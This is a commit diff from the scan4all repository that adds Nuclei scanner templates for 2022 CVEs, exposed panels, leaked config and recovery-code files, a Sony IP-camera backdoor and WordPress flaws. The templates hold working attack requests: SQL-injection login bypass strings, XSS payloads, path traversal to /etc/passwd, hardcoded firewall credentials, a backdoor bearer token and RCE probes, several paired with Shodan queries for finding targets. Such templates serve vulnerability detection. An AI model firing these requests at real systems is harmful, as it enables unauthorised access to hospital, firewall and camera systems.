STRLCPY/scan4all

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-0678.yaml

1	+	id: CVE-2022-0678
2	+
3	+	info:
4	+	name: Microweber < 1.2.11- Cross-Site Scripting
5	+	author: tess
6	+	severity: medium
7	+	description: \|
8	+	Cross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.
9	+	reference:
10	+	- https://huntr.dev/bounties/d707137a-aace-44c5-b15c-1807035716c0/
11	+	- https://twitter.com/CVEnew/status/1495001503249178624?s=20&t=sfABvm7oG39Fd6rG44vQWg
12	+	- https://nvd.nist.gov/vuln/detail/CVE-2022-0678
13	+	- https://huntr.dev/bounties/d707137a-aace-44c5-b15c-1807035716c0
14	+	classification:
15	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
16	+	cvss-score: 6.1
17	+	cve-id: CVE-2022-0678
18	+	cwe-id: CWE-79
19	+	metadata:
20	+	shodan-query: http.favicon.hash:780351152
21	+	verified: "true"
22	+	tags: huntr,cve,cve2022,xss,microweber
23	+
24	+	requests:
25	+	- method: GET
26	+	path:
27	+	- '{{BaseURL}}/demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
28	+
29	+	matchers-condition: and
30	+	matchers:
31	+	- type: word
32	+	part: body
33	+	words:
34	+	- '><script>alert(document.domain)</script>'
35	+	- 'content="Microweber"'
36	+	condition: and
37	+
38	+	- type: word
39	+	part: header
40	+	words:
41	+	- text/html
42	+
43	+	- type: status
44	+	status:
45	+	- 404
46	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-29775.yaml

1	+	id: CVE-2022-29775
2	+
3	+	info:
4	+	name: iSpyConnect iSpy v7.2.2.0 - Improper Authentication
5	+	author: arafatansari
6	+	severity: critical
7	+	description: \|
8	+	iSpyConnect iSpy v7.2.2.0 allows attackers to bypass authentication via a crafted URL.
9	+	reference:
10	+	- https://gist.github.com/securylight/79f673aa3a453c80c0e78f356a8f650b
11	+	- https://github.com/securylight/CVES_write_ups/blob/main/iSpy_connect.pdf
12	+	- https://nvd.nist.gov/vuln/detail/CVE-2022-29775
13	+	- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29775
14	+	classification:
15	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
16	+	cvss-score: 9.8
17	+	cve-id: CVE-2022-29775
18	+	cwe-id: CWE-287
19	+	metadata:
20	+	shodan-query: http.html:"iSpy is running"
21	+	verified: "true"
22	+	tags: cve,cve2022,ispy,auth-bypass
23	+
24	+	requests:
25	+	- method: GET
26	+	path:
27	+	- '{{BaseURL}}/logfile?d=crossdomain.xml'
28	+
29	+	matchers-condition: and
30	+	matchers:
31	+	- type: word
32	+	part: body
33	+	words:
34	+	- 'Log Start'
35	+	- 'Log File'
36	+	- 'iSpy'
37	+	condition: and
38	+
39	+	- type: word
40	+	part: header
41	+	words:
42	+	- text/html
43	+
44	+	- type: status
45	+	status:
46	+	- 200
47	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-32094.yaml

1	+	id: CVE-2022-32094
2	+
3	+	info:
4	+	name: Hospital Management System v1.0 - SQL Injection
5	+	author: arafatansari
6	+	severity: critical
7	+	description: \|
8	+	Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in /HMS/doctor.php.
9	+	reference:
10	+	- https://github.com/Danie1233/Hospital-Management-System-v1.0-SQLi-3/
11	+	- https://nvd.nist.gov/vuln/detail/CVE-2022-32094
12	+	classification:
13	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
14	+	cvss-score: 9.8
15	+	cve-id: CVE-2022-32094
16	+	cwe-id: CWE-89
17	+	metadata:
18	+	shodan-query: http.html:"Hospital Management System"
19	+	verified: "true"
20	+	tags: cve,cve2022,hms,cms,sqli,auth-bypass
21	+
22	+	requests:
23	+	- raw:
24	+	- \|
25	+	POST /hms/doctor/ HTTP/1.1
26	+	Host: {{Hostname}}
27	+	Content-Type: application/x-www-form-urlencoded
28	+
29	+	username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=
30	+
31	+	redirects: true
32	+	max-redirects: 2
33	+	cookie-reuse: true
34	+	matchers-condition: and
35	+	matchers:
36	+	- type: word
37	+	part: body
38	+	words:
39	+	- '<title>Doctor \| Dashboard</title>'
40	+	- 'View Appointment History'
41	+	condition: and
42	+
43	+	- type: status
44	+	status:
45	+	- 200
46	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-34590.yaml

1	+	id: CVE-2022-34590
2	+
3	+	info:
4	+	name: Hospital Management System v1.0 - SQL Injection
5	+	author: arafatansari
6	+	severity: high
7	+	description: \|
8	+	Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in /HMS/admin.php.
9	+	reference:
10	+	- https://github.com/Renrao/bug_report/blob/master/blob/main/vendors/itsourcecode.com/hospital-management-system/sql_injection.md
11	+	- https://nvd.nist.gov/vuln/detail/CVE-2022-34590
12	+	classification:
13	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
14	+	cvss-score: 7.2
15	+	cve-id: CVE-2022-34590
16	+	cwe-id: CWE-89
17	+	metadata:
18	+	shodan-query: http.html:"Hospital Management System"
19	+	verified: "true"
20	+	tags: cve,cve2022,hms,cms,sqli
21	+
22	+	requests:
23	+	- raw:
24	+	- \|
25	+	POST /hms/admin/ HTTP/1.1
26	+	Host: {{Hostname}}
27	+	Content-Type: application/x-www-form-urlencoded
28	+
29	+	username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=
30	+
31	+	redirects: true
32	+	max-redirects: 2
33	+	cookie-reuse: true
34	+	matchers-condition: and
35	+	matchers:
36	+	- type: word
37	+	part: body
38	+	words:
39	+	- '<title>Admin \| Dashboard</title>'
40	+	- 'Manage Patients'
41	+	- 'Manage Doctors'
42	+	condition: and
43	+
44	+	- type: status
45	+	status:
46	+	- 200
47	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-35405.yaml

1	1		id: CVE-2022-35405
2	2
3	3		info:
4		-	name: Zoho ManageEngine Password Manager Pro - Unauthenticated Remote Command Execution
5		-	author: true13
	4	+	name: Zoho ManageEngine Password Manager Pro and PAM 360 - Unauthenticated Remote Command Execution
	5	+	author: viniciuspereiras,true13
6	6		severity: critical
7	7		description: \|
8		-	This is a de-serialization vulnerability that causes unauthenticated RCE in XML-RPC of Zoho Manage Engine Password Manager Pro.
	8	+	This is a de-serialization vulnerability that causes unauthenticated RCE in XML-RPC of Zoho Manage Engine Password Manager Pro, PAM360 and Access Manager Plus (Authenticated).
9	9		reference:
10	10		- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/zoho_password_manager_pro_xml_rpc_rce.rb
11	11		- https://xz.aliyun.com/t/11578
12	12		- https://nvd.nist.gov/vuln/detail/CVE-2022-35405
13	13		- https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html
	14	+	- https://www.bigous.me/2022/09/06/CVE-2022-35405.html
14	15		classification:
15	16		cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
16	17		cvss-score: 9.8
17	18		cve-id: CVE-2022-35405
18	19		metadata:
19		-	shodan-query: http.title:"ManageEngine Password"
	20	+	shodan-query: http.title:"ManageEngine"
20	21		tags: cve,cve2022,rce,zoho,passwordmanager,deserialization,unauth,msf
21	22
22	23		requests:
		skipped 1 lines
24	25		- \|
25	26		POST /xmlrpc HTTP/1.1
26	27		Host: {{Hostname}}
27		-	Content-Type: text/xml
28	28
29		-	<?xml version="1.0"?>
30		-	<methodCall>
31		-	<methodName>ProjectDiscovery</methodName>
32		-	<params>
33		-	<param>
34		-	<value>
35		-	<struct>
36		-	<member>
37		-	<name>test</name>
38		-	<value>
39		-	<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions"></serializable>
40		-	</value>
41		-	</member>
42		-	</struct>
43		-	</value>
44		-	</param>
45		-	</params>
46		-	</methodCall>
	29	+	<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>big0us</value></param></params></methodCall>
47	30
48		-	matchers-condition: and
	31	+	- \|
	32	+	POST /xmlrpc HTTP/1.1
	33	+	Host: {{Host}}:7272
	34	+
	35	+	<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>big0us</value></param></params></methodCall>
	36	+	- \|
	37	+	POST /xmlrpc HTTP/1.1
	38	+	Host: {{Host}}:8282
	39	+
	40	+	<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>big0us</value></param></params></methodCall>
	41	+	- \|
	42	+	POST /xmlrpc HTTP/1.1
	43	+	Host: {{Host}}:9292
	44	+
	45	+	<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>big0us</value></param></params></methodCall>
	46	+
49	47		matchers:
50	48		- type: word
51	49		part: body
52	50		words:
53		-	- "Failed to read result object: null"
54		-
55		-	- type: word
56		-	part: header
57		-	words:
58		-	- text/xml
	51	+	- "faultString"
	52	+	- "No such service [ProjectDiscovery]"
	53	+	- "methodResponse"
	54	+	condition: or
59	55

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-35413.yaml

1	+	id: CVE-2022-35413
2	+
3	+	info:
4	+	name: Wapples Web Application Firewall - Hardcoded credentials
5	+	author: For3stCo1d
6	+	severity: critical
7	+	description: \|
8	+	WAPPLES through 6.0 has a hardcoded systemi account accessible via db/wp.no1 (as configured in the /opt/penta/wapples/script/wcc_auto_scaling.py file). A threat actor could use this account to access the system configuration and confidential information (such as SSL keys) via an HTTPS request to the /webapi/ URI on port 443 or 5001.
9	+	reference:
10	+	- https://medium.com/@_sadshade/wapples-web-application-firewall-multiple-vulnerabilities-35bdee52c8fb
11	+	- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35413
12	+	- https://azuremarketplace.microsoft.com/en/marketplace/apps/penta-security-systems-inc.wapples_sa_v6?tab=Overview
13	+	metadata:
14	+	shodan-query: http.title:"Intelligent WAPPLES"
15	+	verified: "true"
16	+	tags: cve,cve2022,wapples,firewall,default-login
17	+
18	+	requests:
19	+	- raw:
20	+	- \|
21	+	POST /webapi/auth HTTP/1.1
22	+	Host: {{Hostname}}
23	+	Content-Type: application/x-www-form-urlencoded
24	+
25	+	id={{username}}&password={{password}}
26	+
27	+	attack: pitchfork
28	+	payloads:
29	+	username:
30	+	- systemi
31	+	password:
32	+	- db/wp.no1
33	+
34	+	matchers-condition: and
35	+	matchers:
36	+	- type: word
37	+	part: body
38	+	words:
39	+	- '"res_msg":"Authentication Success."'
40	+	- '"doc_id":"user_systemi"'
41	+	condition: and
42	+
43	+	- type: word
44	+	part: header
45	+	words:
46	+	- WP_SESSID=
47	+
48	+	- type: status
49	+	status:
50	+	- 200
51	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-38637.yaml

1	+	id: CVE-2022-38637
2	+
3	+	info:
4	+	name: Hospital Management System v1.0 - SQL Injection
5	+	author: arafatansari
6	+	severity: high
7	+	description: \|
8	+	Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in /HMS/user-login.php.
9	+	reference:
10	+	- https://www.youtube.com/watch?v=m8nW0p69UHU
11	+	- https://nvd.nist.gov/vuln/detail/CVE-2022-38637
12	+	- https://owasp.org/www-community/attacks/SQL_Injection
13	+	classification:
14	+	cve-id: CVE-2022-38637
15	+	metadata:
16	+	shodan-query: http.html:"Hospital Management System"
17	+	verified: "true"
18	+	tags: cve,cve2022,hms,cms,sqli,auth-bypass
19	+
20	+	requests:
21	+	- raw:
22	+	- \|
23	+	POST /hms/user-login.php HTTP/1.1
24	+	Host: {{Hostname}}
25	+	Content-Type: application/x-www-form-urlencoded
26	+
27	+	username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=
28	+
29	+	redirects: true
30	+	max-redirects: 2
31	+	cookie-reuse: true
32	+	matchers-condition: and
33	+	matchers:
34	+	- type: word
35	+	part: body
36	+	words:
37	+	- '<title>User \| Dashboard</title>'
38	+	- 'Book My Appointment'
39	+	condition: and
40	+
41	+	- type: status
42	+	status:
43	+	- 200
44	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-40734.yaml

1	+	id: CVE-2022-40734
2	+
3	+	info:
4	+	name: UniSharp aka Laravel Filemanager v2.5.1 - Directory Traversal
5	+	author: arafatansari
6	+	severity: high
7	+	description: \|
8	+	UniSharp laravel-filemanager (aka Laravel Filemanager) through 2.5.1 allows download?working_dir=%2F.. directory traversal to read arbitrary files.
9	+	reference:
10	+	- https://github.com/UniSharp/laravel-filemanager/issues/1150
11	+	- https://nvd.nist.gov/vuln/detail/CVE-2022-40734
12	+	classification:
13	+	cve-id: CVE-2022-40734
14	+	metadata:
15	+	verified: true
16	+	shodan-query: http.html:"Laravel Filemanager"
17	+	tags: cve,cve2022,laravel,unisharp,lfi,traversal
18	+
19	+	requests:
20	+	- method: GET
21	+	path:
22	+	- "{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"
23	+	- "{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"
24	+
25	+	stop-at-first-match: true
26	+	matchers:
27	+	- type: regex
28	+	regex:
29	+	- "root:[x*]:0:0"
30	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/exposed-panels/footprints-panel.yaml

1	+	id: footprints-panel
2	+
3	+	info:
4	+	name: footprints panel
5	+	author: tess
6	+	severity: info
7	+	metadata:
8	+	verified: true
9	+	shodan-query: title:"FootPrints Service Core Login"
10	+	tags: tech,panel,footprints
11	+
12	+	requests:
13	+	- method: GET
14	+	path:
15	+	- '{{BaseURL}}/MRcgi/MRlogin.pl'
16	+	- '{{BaseURL}}/MRcgi/MRentrancePage.pl'
17	+
18	+	stop-at-first-match: true
19	+
20	+	matchers-condition: and
21	+	matchers:
22	+	- type: word
23	+	part: body
24	+	words:
25	+	- 'FootPrints Service Core Login'
26	+
27	+	- type: status
28	+	status:
29	+	- 200
30	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/exposed-panels/hospital-management-panel.yaml

1	+	id: hospital-management-panel
2	+
3	+	info:
4	+	name: Hospital Management System Panel
5	+	author: arafatansari
6	+	severity: info
7	+	metadata:
8	+	verified: true
9	+	shodan-query: http.html:"Hospital Management System"
10	+	tags: panel,hms,cms
11	+
12	+	requests:
13	+	- method: GET
14	+	path:
15	+	- "{{BaseURL}}/index.html"
16	+
17	+	matchers-condition: and
18	+	matchers:
19	+	- type: word
20	+	part: body
21	+	words:
22	+	- 'Hospital Management System'
23	+	- 'Doctors Login'
24	+	- 'Admin Login'
25	+	condition: and
26	+
27	+	- type: status
28	+	status:
29	+	- 200
30	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/exposures/configs/firebase-config-exposure.yaml

		skipped 10 lines
11	11		requests:
12	12		- method: GET
13	13		path:
	14	+	- "{{BaseURL}}"
14	15		- "{{BaseURL}}/public/config.js"
15	16		- "{{BaseURL}}/config.js"
16	17
		skipped 15 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/exposures/configs/redis-config.yaml

1	+	id: redis-config
2	+
3	+	info:
4	+	name: Redis Configuration File Exposure
5	+	author: geeknik
6	+	severity: medium
7	+	reference: https://redis.io/docs/manual/config/
8	+	metadata:
9	+	verified: true
10	+	shodan-query: html:"redis.conf"
11	+	tags: redis,exposure,config
12	+
13	+	requests:
14	+	- method: GET
15	+	path:
16	+	- "{{BaseURL}}/redis.conf"
17	+
18	+	matchers-condition: and
19	+	matchers:
20	+	- type: word
21	+	part: body
22	+	words:
23	+	- "bind"
24	+	- "protected-mode"
25	+	- "port "
26	+	condition: and
27	+
28	+	- type: word
29	+	part: header
30	+	words:
31	+	- "application/octet-stream"
32	+
33	+	- type: status
34	+	status:
35	+	- 200
36	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/exposures/configs/tox-ini.yaml

1	+	id: tox-ini
2	+
3	+	info:
4	+	name: tox.ini File Exposure
5	+	author: geeknik
6	+	severity: low
7	+	reference: https://tox.wiki/en/latest/config.html
8	+	metadata:
9	+	verified: true
10	+	shodan-query: html:"tox.ini"
11	+	tags: exposure,config,tox
12	+
13	+	requests:
14	+	- method: GET
15	+	path:
16	+	- "{{BaseURL}}/tox.ini"
17	+
18	+	matchers-condition: and
19	+	matchers:
20	+	- type: word
21	+	part: body
22	+	words:
23	+	- "[tox]"
24	+	- "[testenv]"
25	+	condition: and
26	+
27	+	- type: word
28	+	part: header
29	+	words:
30	+	- "application/octet-stream"
31	+
32	+	- type: status
33	+	status:
34	+	- 200
35	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/exposures/configs/ventrilo-config.yaml

1	+	id: ventrilo-config
2	+
3	+	info:
4	+	name: Ventrilo Configuration File
5	+	author: geeknik
6	+	severity: high
7	+	description: \|
8	+	It discloses the AdminPassword and Password of the application.
9	+	reference:
10	+	- https://www.ventrilo.com/setup.php
11	+	metadata:
12	+	verified: true
13	+	tags: ventrilo,config,exposure
14	+
15	+	requests:
16	+	- method: GET
17	+	path:
18	+	- "{{BaseURL}}/ventrilo_srv.ini"
19	+
20	+	matchers-condition: and
21	+	matchers:
22	+	- type: word
23	+	words:
24	+	- "[Server]"
25	+	- "Name"
26	+	- "Phonetic"
27	+	condition: and
28	+
29	+	- type: word
30	+	part: header
31	+	words:
32	+	- "text/plain"
33	+
34	+	- type: status
35	+	status:
36	+	- 200
37	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/exposures/files/vscode-sftp.yaml

1	+	id: vscode-sftp
2	+
3	+	info:
4	+	name: VSCode SFTP File Exposure
5	+	author: geeknik
6	+	severity: high
7	+	description: \|
8	+	It discloses sensitive files created by vscode-sftp for VSCode, contains SFTP/SSH server details and credentials.
9	+	metadata:
10	+	verified: true
11	+	shodan-query: html:"sftp.json"
12	+	tags: exposure,vscode,sftp,ssh
13	+
14	+	requests:
15	+	- method: GET
16	+	path:
17	+	- "{{BaseURL}}/sftp.json"
18	+	- "{{BaseURL}}/.config/sftp.json"
19	+	- "{{BaseURL}}/.vscode/sftp.json"
20	+
21	+	stop-at-first-match: true
22	+	matchers-condition: and
23	+	matchers:
24	+	- type: word
25	+	part: body
26	+	words:
27	+	- '"name":'
28	+	- '"host":'
29	+	- '"protocol":'
30	+	condition: and
31	+
32	+	- type: word
33	+	part: header
34	+	words:
35	+	- "application/json"
36	+
37	+	- type: status
38	+	status:
39	+	- 200
40	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/exposures/tokens/discord/discord-backup-code.yaml

1	+	id: discord-backup-code
2	+
3	+	info:
4	+	name: Discord Backup Code Detection
5	+	author: geeknik
6	+	severity: high
7	+	tags: exposure,token,discord
8	+
9	+	requests:
10	+	- method: GET
11	+	path:
12	+	- '{{BaseURL}}/discord-backup-codes.txt'
13	+	- '{{BaseURL}}/discord_backup_codes.txt'
14	+
15	+	stop-at-first-match: true
16	+	matchers-condition: and
17	+	matchers:
18	+	- type: regex
19	+	part: body
20	+	regex:
21	+	- '[0-9A-Za-z]{4}\-[0-9A-Za-z]{4}'
22	+
23	+	- type: status
24	+	status:
25	+	- 200
26	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/exposures/tokens/github/github-recovery-code.yaml

1	+	id: github-recovery-code
2	+
3	+	info:
4	+	name: Github Recovery Code Detection
5	+	author: geeknik
6	+	severity: high
7	+	metadata:
8	+	verified: true
9	+	tags: exposure,token,github
10	+
11	+	requests:
12	+	- method: GET
13	+	path:
14	+	- '{{BaseURL}}/github-recovery-codes.txt'
15	+	- '{{BaseURL}}/github_recovery_codes.txt'
16	+
17	+	stop-at-first-match: true
18	+	matchers-condition: and
19	+	matchers:
20	+	- type: regex
21	+	part: body
22	+	regex:
23	+	- '[0-9A-Za-z]{5}\-[0-9A-Za-z]{5}'
24	+
25	+	- type: status
26	+	status:
27	+	- 200
28	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/exposures/tokens/gitlab/gitlab-recovery-code.yaml

1	+	id: gitlab-recovery-code
2	+
3	+	info:
4	+	name: Gitlab Recovery Code Detection
5	+	author: geeknik
6	+	severity: high
7	+	tags: exposure,token,gitlab
8	+
9	+	requests:
10	+	- method: GET
11	+	path:
12	+	- '{{BaseURL}}/gitlab-recovery-codes.txt'
13	+	- '{{BaseURL}}/gitlab_recovery_codes.txt'
14	+
15	+	stop-at-first-match: true
16	+	matchers-condition: and
17	+	matchers:
18	+	- type: regex
19	+	part: body
20	+	regex:
21	+	- '[0-9A-Za-z]{16}'
22	+
23	+	- type: status
24	+	status:
25	+	- 200
26	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/iot/sony-camera-backdoor.yaml

1	+	id: sony-camera-backdoor
2	+
3	+	info:
4	+	name: Backdoor In Sony IPELA Engine IP Cameras
5	+	author: af001
6	+	severity: high
7	+	description: \|
8	+	Multiple SONY network cameras vulnerable to sensitive information disclosure via hardcoded credentials and a backdoor.
9	+	reference:
10	+	- https://sec-consult.com/vulnerability-lab/advisory/backdoor-vulnerability-in-sony-ipela-engine-ip-cameras/
11	+	- https://www.bleepingcomputer.com/news/security/backdoor-found-in-80-sony-surveillance-camera-models/
12	+	- https://jvn.jp/en/vu/JVNVU96435227/index.html
13	+	- https://www.sony.co.uk/pro/article/sony-new-firmware-for-network-cameras
14	+	remediation: \|
15	+	Upgrade to the latest version of the firmware provided by Sony.
16	+	classification:
17	+	cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
18	+	cvss-score: 8.8
19	+	cve-id: CVE-2016-7834
20	+	cwe-id: CWE-200
21	+	tags: sony,backdoor,unauth,telnet,iot,camera
22	+
23	+	requests:
24	+	- method: GET
25	+	path:
26	+	- "{{BaseURL}}/command/prima-factory.cgi"
27	+
28	+	headers:
29	+	Authorization: Bearer cHJpbWFuYTpwcmltYW5h
30	+
31	+	matchers-condition: and
32	+	matchers:
33	+	- type: word
34	+	part: header
35	+	words:
36	+	- 'gen5th'
37	+	- 'gen6th'
38	+	condition: or
39	+
40	+	- type: status
41	+	status:
42	+	- 204
43	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/misconfiguration/codemeter-webadmin.yaml

1	+	id: codemeter-webadmin
2	+
3	+	info:
4	+	name: CodeMeter Webadmin Dashboard
5	+	author: DhiyaneshDk
6	+	severity: low
7	+	metadata:
8	+	verified: true
9	+	shodan-query: html:"CodeMeter"
10	+	tags: misconfig,exposure,codemeter
11	+
12	+	requests:
13	+	- method: GET
14	+	path:
15	+	- '{{BaseURL}}/index.html'
16	+
17	+	matchers-condition: and
18	+	matchers:
19	+	- type: word
20	+	part: body
21	+	words:
22	+	- 'WebAdmin \| Dashboard'
23	+	- 'CodeMeter'
24	+	condition: and
25	+
26	+	- type: word
27	+	part: header
28	+	words:
29	+	- text/html
30	+
31	+	- type: status
32	+	status:
33	+	- 200
34	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/technologies/ispyconnect-detect.yaml

1	+	id: ispyconnect-detect
2	+
3	+	info:
4	+	name: iSpyConnect - Detect
5	+	author: arafatansari
6	+	severity: info
7	+	metadata:
8	+	verified: true
9	+	shodan-query: http.html:"iSpy"
10	+	tags: tech,ispy
11	+
12	+	requests:
13	+	- method: GET
14	+	path:
15	+	- '{{BaseURL}}'
16	+
17	+	matchers-condition: or
18	+	matchers:
19	+	- type: word
20	+	part: body
21	+	words:
22	+	- 'iSpy is running'
23	+
24	+	- type: word
25	+	part: header
26	+	words:
27	+	- 'Server: iSpy'
28	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/technologies/sitecore-version.yaml

		skipped 29 lines
30	30		regex:
31	31		- "<major>([0-9]+)</major>"
32	32
	33	+	- type: regex
	34	+	group: 1
	35	+	regex:
	36	+	- "<minor>([0-9]+)</minor>"
	37	+
	38	+	- type: regex
	39	+	group: 1
	40	+	regex:
	41	+	- "<build>([0-9]+)</build>"
	42	+
	43	+	- type: regex
	44	+	group: 1
	45	+	regex:
	46	+	- "<revision>([0-9]+)</revision>"
	47	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/other/hospital-management-xss.yaml

1	+	id: hospital-management-xss
2	+
3	+	info:
4	+	name: Hospital Management System v1.0 - Cross Site Scripting
5	+	author: arafatansari
6	+	severity: medium
7	+	description: \|
8	+	Hospital Management System v1.0 was discovered to contain a XSS vulnerability via the searchdata parameter in doctor/search.php.
9	+	metadata:
10	+	verified: true
11	+	shodan-query: http.html:"Hospital Management System"
12	+	comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
13	+	tags: hms,hospital,cms,xss,authenticated
14	+
15	+	requests:
16	+	- raw:
17	+	- \|
18	+	POST /hms/doctor/ HTTP/1.1
19	+	Host: {{Hostname}}
20	+	Content-Type: application/x-www-form-urlencoded
21	+
22	+	username={{username}}password={{password}}&submit=
23	+
24	+	- \|
25	+	POST /hms/doctor/search.php HTTP/1.1
26	+	Host: {{Hostname}}
27	+	Content-Type: application/x-www-form-urlencoded
28	+
29	+	searchdata=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&search=
30	+
31	+	req-condition: true
32	+	cookie-reuse: true
33	+	matchers:
34	+	- type: dsl
35	+	dsl:
36	+	- 'contains(all_headers_2, "text/html")'
37	+	- "status_code_2 == 200"
38	+	- contains(body_2, 'Result against \"<script>alert(document.domain)</script>\" keyword')
39	+	condition: and
40	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/other/hospital-management-xss2.yaml

1	+	id: hospital-management-xss2
2	+
3	+	info:
4	+	name: Hospital Management System v1.0 - Cross Site Scripting
5	+	author: arafatansari
6	+	severity: medium
7	+	description: \|
8	+	Hospital Management System v1.0 was discovered to contain a XSS vulnerability via the searchdata parameter in patient-search.php.
9	+	metadata:
10	+	verified: true
11	+	shodan-query: http.html:"Hospital Management System"
12	+	comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
13	+	tags: hms,hospital,cms,xss,authenticated
14	+
15	+	requests:
16	+	- raw:
17	+	- \|
18	+	POST /hms/admin/ HTTP/1.1
19	+	Host: {{Hostname}}
20	+	Content-Type: application/x-www-form-urlencoded
21	+
22	+	username={{username}}&password={{password}}&submit=
23	+
24	+	- \|
25	+	POST /hms/admin/patient-search.php HTTP/1.1
26	+	Host: {{Hostname}}
27	+	Content-Type: application/x-www-form-urlencoded
28	+
29	+	searchdata=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&search=
30	+
31	+	req-condition: true
32	+	cookie-reuse: true
33	+	matchers:
34	+	- type: dsl
35	+	dsl:
36	+	- 'contains(all_headers_2, "text/html")'
37	+	- "status_code_2 == 200"
38	+	- contains(body_2, 'Result against \"<script>alert(document.domain)</script>\" keyword')
39	+	condition: and
40	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/other/wapples-firewall-lfi.yaml

1	+	id: wapples-firewall-lfi
2	+
3	+	info:
4	+	name: Wapples Web Application Firewall - Arbitrary File Download
5	+	author: For3stCo1d
6	+	severity: high
7	+	reference:
8	+	- https://medium.com/@_sadshade/wapples-web-application-firewall-multiple-vulnerabilities-35bdee52c8fb
9	+	metadata:
10	+	verified: true
11	+	shodan-query: http.title:"Intelligent WAPPLES"
12	+	tags: wapples,firewall,lfi,authenticated
13	+
14	+	requests:
15	+	- raw:
16	+	- \|
17	+	POST /webapi/auth HTTP/1.1
18	+	Host: {{Hostname}}
19	+	Content-Type: application/x-www-form-urlencoded
20	+
21	+	id={{username}}&password={{password}}
22	+
23	+	- \|
24	+	GET /webapi/file/transfer?name=/../../../../../../../../etc/passwd&type=db_backup HTTP/1.1
25	+	Host: {{Hostname}}
26	+	Content-Type: application/x-www-form-urlencoded
27	+
28	+	attack: pitchfork
29	+	payloads:
30	+	username:
31	+	- systemi
32	+	password:
33	+	- db/wp.no1
34	+
35	+	cookie-reuse: true
36	+	matchers:
37	+	- type: regex
38	+	regex:
39	+	- "root:[x*]:0:0"
40	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml

1	+	id: 3dprint-arbitrary-file-upload
2	+
3	+	info:
4	+	name: 3DPrint Lite < 1.9.1.5 - Unauthenticated Arbitrary File Upload
5	+	author: SecTheBit
6	+	severity: high
7	+	description: \|
8	+	The p3dlite_handle_upload AJAX action of the plugin does not have any authorisation and does not check the uploaded file, allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.
9	+	reference:
10	+	- https://wpscan.com/vulnerability/c46ecd0d-a132-4ad6-b936-8acde3a09282
11	+	- https://www.exploit-db.com/exploits/50321
12	+	metadata:
13	+	verified: true
14	+	tags: wpscan,edb,wordpress,wp,wp-plugin,fileupload,intrusive,3dprint
15	+
16	+	requests:
17	+	- raw:
18	+	- \|
19	+	POST /wp-admin/admin-ajax.php HTTP/1.1
20	+	Host: {{Hostname}}
21	+	Accept-Encoding: gzip, deflate
